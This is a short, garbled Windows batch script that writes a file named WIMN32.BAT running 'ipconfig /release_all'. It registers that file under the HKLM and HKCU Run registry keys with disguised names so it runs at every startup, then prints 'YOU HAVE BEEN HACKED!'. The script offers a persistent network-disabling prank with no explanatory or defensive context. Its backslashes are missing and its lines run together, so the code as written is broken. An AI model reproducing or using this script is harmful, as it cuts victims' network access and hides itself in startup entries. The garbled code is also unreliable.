ECHO @ECHO OFF>C:WINDOWSWIMN32.BAT
ECHO BREAK OFF>C:WINDOWSWIMN32.BAT ECHO
IPCONFIG/RELEASE_ALL>C:WINDOWSWIMN32.BAT
ECHO END>C:WINDOWSWIMN32.BATREG ADD
HKEY_LOCAL_MACHINESOFTWAREMICROSOFTWINDOWSCURRENTVERSIONRUN /V WINDOWSAPI /T REG_SZ /D C:WINDOWSWIMN32.BAT /FREG ADD
HKEY_CURRENT_USERSOFTWAREMICROSOFTWINDOWSCURRENTVERSIONRUN /V CONTROLEXIT /T REG_SZ /D C:WINDOWSWIMN32.BAT /FECHO YOU HAVE BEEN HACKED!
PAUSE